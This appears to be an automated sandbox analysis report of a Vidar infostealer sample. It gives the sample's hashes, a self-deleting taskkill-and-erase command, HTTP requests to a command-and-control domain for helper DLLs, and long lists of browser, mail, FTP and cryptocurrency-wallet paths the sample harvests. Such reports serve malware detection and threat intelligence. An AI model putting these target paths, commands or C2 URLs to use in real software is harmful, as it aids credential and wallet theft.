paladin316

Vidar_a85132af1b5651472eb4ad093e1bb0f5_exe.txt

Jul 22nd, 2019
  1. * MalFamily: "Vidar"
  2.  
  3. * MalScore: 10.0
  4.  
  5. * File Name: "Vidar_a85132af1b5651472eb4ad093e1bb0f5.exe"
  6. * File Size: 684032
  7. * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
  8. * SHA256: "012e9cbd15b3e19b703a118b0fb4c48df46a505416fb629b7764178f74cd8b53"
  9. * MD5: "a85132af1b5651472eb4ad093e1bb0f5"
  10. * SHA1: "280312657d13f403527b1b3cec7e577c1e5de64b"
  11. * SHA512: "1cbe8fd4394f72a0d4a904a06447ce07eb577d5d10adb44096e38bd5ab069d3752e3dba573f38512010a118df639cddcbb78231285f1c6f6dd14c1b0ccbe42df"
  12. * CRC32: "BFC0FAFA"
  13. * SSDEEP: "12288:TEtUmRfjBeCq3SkqTJ3N4FsOevUBPqt4Ma5DG2/dIM9hbU2nv68mKQO:YKEfjB1q3Sl0mOpBCtzYVl9hQWLdQO"
  14.  
  15. * Process Execution:
  16. "Ursnif_a85132af1b5651472eb4ad093e1bb0f5.exe",
  17. "cmd.exe",
  18. "taskkill.exe",
  19. "services.exe",
  20. "svchost.exe",
  21. "WmiPrvSE.exe",
  22. "taskhost.exe"
  23.  
  24.  
  25. * Executed Commands:
  26. "C:\\Windows\\System32\\cmd.exe /c taskkill /im Ursnif_a85132af1b5651472eb4ad093e1bb0f5.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\Ursnif_a85132af1b5651472eb4ad093e1bb0f5.exe & exit",
  27. "C:\\Windows\\system32\\lsass.exe",
  28. "C:\\Windows\\system32\\svchost.exe -k netsvcs",
  29. "taskkill /im Ursnif_a85132af1b5651472eb4ad093e1bb0f5.exe /f"
  30.  
  31.  
  32. * Signatures Detected:
  33.  
  34. "Description": "Creates RWX memory",
  35. "Details":
  36.  
  37.  
  38. "Description": "A process attempted to delay the analysis task.",
  39. "Details":
  40.  
  41. "Process": "WmiPrvSE.exe tried to sleep 600 seconds, actually delayed analysis time by 0 seconds"
  42.  
  43.  
  44.  
  45.  
  46. "Description": "A process created a hidden window",
  47. "Details":
  48.  
  49. "Process": "Ursnif_a85132af1b5651472eb4ad093e1bb0f5.exe -> C:\\Windows\\System32\\cmd.exe"
  50.  
  51.  
  52.  
  53.  
  54. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  55. "Details":
  56.  
  57. "post_no_referer": "HTTP traffic contains a POST request with no referer header"
  58.  
  59.  
  60. "post_no_useragent": "HTTP traffic contains a POST request with no user-agent header"
  61.  
  62.  
  63. "get_no_useragent": "HTTP traffic contains a GET request with no user-agent header"
  64.  
  65.  
  66. "suspicious_request": "http://otnet.xyz/141"
  67.  
  68.  
  69. "suspicious_request": "http://otnet.xyz/freebl3.dll"
  70.  
  71.  
  72. "suspicious_request": "http://otnet.xyz/freebl3.dll?ddosprotected=1"
  73.  
  74.  
  75. "suspicious_request": "http://otnet.xyz/mozglue.dll"
  76.  
  77.  
  78. "suspicious_request": "http://otnet.xyz/msvcp140.dll"
  79.  
  80.  
  81. "suspicious_request": "http://otnet.xyz/nss3.dll"
  82.  
  83.  
  84. "suspicious_request": "http://otnet.xyz/softokn3.dll"
  85.  
  86.  
  87. "suspicious_request": "http://otnet.xyz/vcruntime140.dll"
  88.  
  89.  
  90. "suspicious_request": "http://ip-api.com/line/"
  91.  
  92.  
  93. "suspicious_request": "http://otnet.xyz/"
  94.  
  95.  
  96.  
  97.  
  98. "Description": "Performs some HTTP requests",
  99. "Details":
  100.  
  101. "url": "http://otnet.xyz/141"
  102.  
  103.  
  104. "url": "http://otnet.xyz/freebl3.dll"
  105.  
  106.  
  107. "url": "http://otnet.xyz/freebl3.dll?ddosprotected=1"
  108.  
  109.  
  110. "url": "http://otnet.xyz/mozglue.dll"
  111.  
  112.  
  113. "url": "http://otnet.xyz/msvcp140.dll"
  114.  
  115.  
  116. "url": "http://otnet.xyz/nss3.dll"
  117.  
  118.  
  119. "url": "http://otnet.xyz/softokn3.dll"
  120.  
  121.  
  122. "url": "http://otnet.xyz/vcruntime140.dll"
  123.  
  124.  
  125. "url": "http://ip-api.com/line/"
  126.  
  127.  
  128. "url": "http://otnet.xyz/"
  129.  
  130.  
  131.  
  132.  
  133. "Description": "Deletes its original binary from disk",
  134. "Details":
  135.  
  136.  
  137. "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
  138. "Details":
  139.  
  140. "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 11879534 times"
  141.  
  142.  
  143.  
  144.  
  145. "Description": "Steals private information from local Internet browsers",
  146. "Details":
  147.  
  148. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Cookies\\IE_Cookies.txt"
  149.  
  150.  
  151. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data"
  152.  
  153.  
  154. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Cookies\\Google Chrome_Default.txt"
  155.  
  156.  
  157. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Cookies\\Edge_Cookies.txt"
  158.  
  159.  
  160. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
  161.  
  162.  
  163. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History"
  164.  
  165.  
  166. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies"
  167.  
  168.  
  169.  
  170.  
  171. "Description": "Collects information about installed applications",
  172. "Details":
  173.  
  174. "Program": "Google Update Helper"
  175.  
  176.  
  177. "Program": "Microsoft Excel MUI 2013"
  178.  
  179.  
  180. "Program": "Microsoft Outlook MUI 2013"
  181.  
  182.  
  183.  
  184.  
  185. "Program": "Google Chrome"
  186.  
  187.  
  188. "Program": "Adobe Flash Player 29 NPAPI"
  189.  
  190.  
  191. "Program": "Adobe Flash Player 29 ActiveX"
  192.  
  193.  
  194. "Program": "Microsoft DCF MUI 2013"
  195.  
  196.  
  197. "Program": "Microsoft Access MUI 2013"
  198.  
  199.  
  200. "Program": "Microsoft Office Proofing Tools 2013 - English"
  201.  
  202.  
  203. "Program": "Adobe Acrobat Reader DC"
  204.  
  205.  
  206. "Program": "Microsoft Office Proofing Tools 2013 - Espa\\xef\\xbf\\xb1ol"
  207.  
  208.  
  209. "Program": "Microsoft Publisher MUI 2013"
  210.  
  211.  
  212. "Program": "Outils de v\\xef\\xbf\\xa9rification linguistique 2013 de Microsoft Office\\xef\\xbe\\xa0- Fran\\xef\\xbf\\xa7ais"
  213.  
  214.  
  215. "Program": "Microsoft Office Shared MUI 2013"
  216.  
  217.  
  218. "Program": "Microsoft Office OSM MUI 2013"
  219.  
  220.  
  221. "Program": "Microsoft InfoPath MUI 2013"
  222.  
  223.  
  224. "Program": "Microsoft Office Shared Setup Metadata MUI 2013"
  225.  
  226.  
  227. "Program": "Microsoft Word MUI 2013"
  228.  
  229.  
  230. "Program": "Microsoft Groove MUI 2013"
  231.  
  232.  
  233.  
  234.  
  235. "Program": "Microsoft Access Setup Metadata MUI 2013"
  236.  
  237.  
  238. "Program": "Microsoft Office OSM UX MUI 2013"
  239.  
  240.  
  241. "Program": "Java Auto Updater"
  242.  
  243.  
  244. "Program": "Microsoft PowerPoint MUI 2013"
  245.  
  246.  
  247. "Program": "Microsoft Office Professional Plus 2013"
  248.  
  249.  
  250. "Program": "Adobe Refresh Manager"
  251.  
  252.  
  253. "Program": "Microsoft Office Proofing 2013"
  254.  
  255.  
  256. "Program": "Microsoft Lync MUI 2013"
  257.  
  258.  
  259.  
  260.  
  261. "Program": "Microsoft OneNote MUI 2013"
  262.  
  263.  
  264.  
  265.  
  266. "Description": "Checks the CPU name from registry, possibly for anti-virtualization",
  267. "Details":
  268.  
  269.  
  270. "Description": "Attempts to access Bitcoin/ALTCoin wallets",
  271. "Details":
  272.  
  273. "file": "C:\\Users\\user\\AppData\\Roaming\\Bitcoin\\*.dat"
  274.  
  275.  
  276. "file": "C:\\Users\\user\\AppData\\Roaming\\Bitcoin\\??"
  277.  
  278.  
  279. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Bitcoin\\*.*"
  280.  
  281.  
  282. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Bitcoin\\\\xe1\\x93\\x9d\\xe7\\x9b\\x9e"
  283.  
  284.  
  285. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Electrum\\"
  286.  
  287.  
  288. "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\default_wallet"
  289.  
  290.  
  291. "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\"
  292.  
  293.  
  294. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Electrum\\*.*"
  295.  
  296.  
  297. "file": "C:\\Users\\user\\AppData\\Roaming\\Litecoin\\"
  298.  
  299.  
  300. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Litecoin\\"
  301.  
  302.  
  303. "file": "C:\\Users\\user\\AppData\\Roaming\\Litecoin\\*.dat"
  304.  
  305.  
  306. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Litecoin\\*.*"
  307.  
  308.  
  309. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\NameCoin\\"
  310.  
  311.  
  312. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\NameCoin\\*.*"
  313.  
  314.  
  315. "file": "C:\\Users\\user\\AppData\\Roaming\\Namecoin\\"
  316.  
  317.  
  318. "file": "C:\\Users\\user\\AppData\\Roaming\\Namecoin\\*.dat"
  319.  
  320.  
  321. "file": "C:\\Users\\user\\AppData\\Roaming\\Terracoin\\*.dat"
  322.  
  323.  
  324. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\TerraCoin\\*.*"
  325.  
  326.  
  327. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\TerraCoin\\"
  328.  
  329.  
  330. "file": "C:\\Users\\user\\AppData\\Roaming\\Terracoin\\"
  331.  
  332.  
  333. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\PrimeCoin\\"
  334.  
  335.  
  336. "file": "C:\\Users\\user\\AppData\\Roaming\\Primecoin\\"
  337.  
  338.  
  339. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\PrimeCoin\\*.*"
  340.  
  341.  
  342. "file": "C:\\Users\\user\\AppData\\Roaming\\Primecoin\\*.dat"
  343.  
  344.  
  345. "file": "C:\\Users\\user\\AppData\\Roaming\\Freicoin\\*.dat"
  346.  
  347.  
  348. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\FreiCoin\\"
  349.  
  350.  
  351. "file": "C:\\Users\\user\\AppData\\Roaming\\Freicoin\\"
  352.  
  353.  
  354. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\FreiCoin\\*.*"
  355.  
  356.  
  357. "file": "C:\\Users\\user\\AppData\\Roaming\\devcoin\\"
  358.  
  359.  
  360. "file": "C:\\Users\\user\\AppData\\Roaming\\devcoin\\*.dat"
  361.  
  362.  
  363. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\DevCoin\\"
  364.  
  365.  
  366. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\DevCoin\\*.*"
  367.  
  368.  
  369. "file": "C:\\Users\\user\\AppData\\Roaming\\Franko\\*.dat"
  370.  
  371.  
  372. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Franko\\"
  373.  
  374.  
  375. "file": "C:\\Users\\user\\AppData\\Roaming\\Franko\\"
  376.  
  377.  
  378. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Franko\\*.*"
  379.  
  380.  
  381. "file": "C:\\Users\\user\\AppData\\Roaming\\Megacoin\\*.dat"
  382.  
  383.  
  384. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\MegaCoin\\*.*"
  385.  
  386.  
  387. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\MegaCoin\\"
  388.  
  389.  
  390. "file": "C:\\Users\\user\\AppData\\Roaming\\Megacoin\\"
  391.  
  392.  
  393. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\InfiniteCoin\\"
  394.  
  395.  
  396. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\InfiniteCoin\\*.*"
  397.  
  398.  
  399. "file": "C:\\Users\\user\\AppData\\Roaming\\Infinitecoin\\*.dat"
  400.  
  401.  
  402. "file": "C:\\Users\\user\\AppData\\Roaming\\Infinitecoin\\"
  403.  
  404.  
  405. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\IxCoin\\"
  406.  
  407.  
  408. "file": "C:\\Users\\user\\AppData\\Roaming\\Ixcoin\\"
  409.  
  410.  
  411. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\IxCoin\\*.*"
  412.  
  413.  
  414. "file": "C:\\Users\\user\\AppData\\Roaming\\Ixcoin\\*.dat"
  415.  
  416.  
  417. "file": "C:\\Users\\user\\AppData\\Roaming\\Anoncoin\\"
  418.  
  419.  
  420. "file": "C:\\Users\\user\\AppData\\Roaming\\Anoncoin\\*.dat"
  421.  
  422.  
  423. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Anoncoin\\"
  424.  
  425.  
  426. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Anoncoin\\*.*"
  427.  
  428.  
  429. "file": "C:\\Users\\user\\AppData\\Roaming\\BBQCoin\\*.dat"
  430.  
  431.  
  432. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\BBQCoin\\"
  433.  
  434.  
  435. "file": "C:\\Users\\user\\AppData\\Roaming\\BBQCoin\\"
  436.  
  437.  
  438. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\BBQCoin\\*.*"
  439.  
  440.  
  441. "file": "C:\\Users\\user\\AppData\\Roaming\\digitalcoin\\*.dat"
  442.  
  443.  
  444. "file": "C:\\Users\\user\\AppData\\Roaming\\digitalcoin\\"
  445.  
  446.  
  447. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\DigitalCoin\\*.*"
  448.  
  449.  
  450. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\DigitalCoin\\"
  451.  
  452.  
  453. "file": "C:\\Users\\user\\AppData\\Roaming\\Mincoin\\*.dat"
  454.  
  455.  
  456. "file": "C:\\Users\\user\\AppData\\Roaming\\Mincoin\\"
  457.  
  458.  
  459. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\MinCoin\\*.*"
  460.  
  461.  
  462. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\MinCoin\\"
  463.  
  464.  
  465. "file": "C:\\Users\\user\\AppData\\Roaming\\GoldCoin (GLD)\\*.dat"
  466.  
  467.  
  468. "file": "C:\\Users\\user\\AppData\\Roaming\\GoldCoin (GLD)\\"
  469.  
  470.  
  471. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\YACoin\\"
  472.  
  473.  
  474. "file": "C:\\Users\\user\\AppData\\Roaming\\YACoin\\*.dat"
  475.  
  476.  
  477. "file": "C:\\Users\\user\\AppData\\Roaming\\YACoin\\"
  478.  
  479.  
  480. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\YACoin\\*.*"
  481.  
  482.  
  483. "file": "C:\\Users\\user\\AppData\\Roaming\\Florincoin\\*.dat"
  484.  
  485.  
  486. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\FlorinCoin\\"
  487.  
  488.  
  489. "file": "C:\\Users\\user\\AppData\\Roaming\\Florincoin\\"
  490.  
  491.  
  492. "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\FlorinCoin\\*.*"
  493.  
  494.  
  495.  
  496.  
  497. "Description": "Harvests credentials from local FTP client software",
  498. "Details":
  499.  
  500. "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\recentservers.xml"
  501.  
  502.  
  503.  
  504.  
  505. "Description": "Harvests information related to installed instant messenger clients",
  506. "Details":
  507.  
  508. "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
  509.  
  510.  
  511.  
  512.  
  513. "Description": "Harvests information related to installed mail clients",
  514. "Details":
  515.  
  516. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003"
  517.  
  518.  
  519. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000007"
  520.  
  521.  
  522. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000006"
  523.  
  524.  
  525. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000005"
  526.  
  527.  
  528. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000004"
  529.  
  530.  
  531. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000009"
  532.  
  533.  
  534. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000008"
  535.  
  536.  
  537.  
  538.  
  539. "Description": "Collects information to fingerprint the system",
  540. "Details":
  541.  
  542.  
  543. "Description": "Created network traffic indicative of malicious activity",
  544. "Details":
  545.  
  546. "signature": "ET TROJAN Vidar/Arkei Stealer Client Data Upload"
  547.  
  548.  
  549.  
  550.  
  551.  
  552. * Started Service:
  553. "VaultSvc"
  554.  
  555.  
  556. * Mutexes:
  557. "00000000-0000-0000-0000-0000000000003d3783a0-703a-11de-8c7a-806e6f6e6963"
  558.  
  559.  
  560. * Modified Files:
  561. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\passwords.txt",
  562. "C:\\ProgramData\\freebl3.dll",
  563. "C:\\ProgramData\\mozglue.dll",
  564. "C:\\ProgramData\\msvcp140.dll",
  565. "C:\\ProgramData\\nss3.dll",
  566. "C:\\ProgramData\\softokn3.dll",
  567. "C:\\ProgramData\\vcruntime140.dll",
  568. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\ld",
  569. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\historych",
  570. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\History\\Google Chrome_Default.txt",
  571. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Downloads\\Google Chrome_Default.txt",
  572. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\c",
  573. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Cookies\\Google Chrome_Default.txt",
  574. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\wd",
  575. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Autofill\\Google Chrome_Default.txt",
  576. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\CC\\Google Chrome_Default.txt",
  577. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Soft\\Authy\\\\xea\\x9b\\xb0\\xce\\x90\\xeb\\x82\\xa8\\xc8\\xa7\\xef\\xba\\xa0\\xc8\\xbf\\xe9\\x93\\x90\\xc8\\xb8",
  578. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Cookies\\IE_Cookies.txt",
  579. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Cookies\\Edge_Cookies.txt",
  580. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\cookie_list.txt",
  581. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\outlook.txt",
  582. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\information.txt",
  583. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Files\\Default.zip",
  584. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Bitcoin\\\\xe1\\x93\\x9d\\xe7\\x9b\\x9e",
  585. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Ethereum\\",
  586. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Electrum\\",
  587. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\ElectrumLTC\\\r",
  588. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Exodus\\",
  589. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\ElectronCash\\\r",
  590. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\MultiDoge\\",
  591. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Zcash\\",
  592. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\DashCore\\",
  593. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Litecoin\\",
  594. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Anoncoin\\",
  595. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\BBQCoin\\",
  596. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\DevCoin\\",
  597. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\DigitalCoin\\",
  598. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\FlorinCoin\\",
  599. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Franko\\",
  600. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\FreiCoin\\",
  601. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\GoldCoinGLD\\",
  602. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\InfiniteCoin\\",
  603. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\IOCoin\\",
  604. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\IxCoin\\",
  605. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\MegaCoin\\",
  606. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\MinCoin\\",
  607. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\NameCoin\\",
  608. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\PrimeCoin\\",
  609. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\TerraCoin\\",
  610. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\YACoin\\",
  611. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\JAXX\\\r",
  612. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\screenshot.jpg",
  613. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\CA_00000000-0000-0000-0000-0000000000004771908667.zip",
  614. "C:\\Windows\\sysnative\\LogFiles\\Scm\\5869f1c1-01d7-41f7-84b7-715672259fa8",
  615. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM"
  616.  
  617.  
  618. * Deleted Files:
  619. "C:\\ProgramData\\freebl3.dll",
  620. "C:\\ProgramData\\mozglue.dll",
  621. "C:\\ProgramData\\msvcp140.dll",
  622. "C:\\ProgramData\\nss3.dll",
  623. "C:\\ProgramData\\softokn3.dll",
  624. "C:\\ProgramData\\vcruntime140.dll",
  625. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Autofill\\Google Chrome_Default.txt",
  626. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Autofill",
  627. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\CC\\Google Chrome_Default.txt",
  628. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\CC",
  629. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Cookies\\Edge_Cookies.txt",
  630. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Cookies\\Google Chrome_Default.txt",
  631. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Cookies\\IE_Cookies.txt",
  632. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Cookies",
  633. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\cookie_list.txt",
  634. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Downloads\\Google Chrome_Default.txt",
  635. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Downloads",
  636. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Files\\Default.zip",
  637. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Files",
  638. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\History\\Google Chrome_Default.txt",
  639. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\History",
  640. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\information.txt",
  641. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\outlook.txt",
  642. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\passwords.txt",
  643. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\screenshot.jpg",
  644. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Soft\\Authy",
  645. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Soft",
  646. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Anoncoin",
  647. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\BBQCoin",
  648. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Bitcoin",
  649. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\DashCore",
  650. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\DevCoin",
  651. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\DigitalCoin",
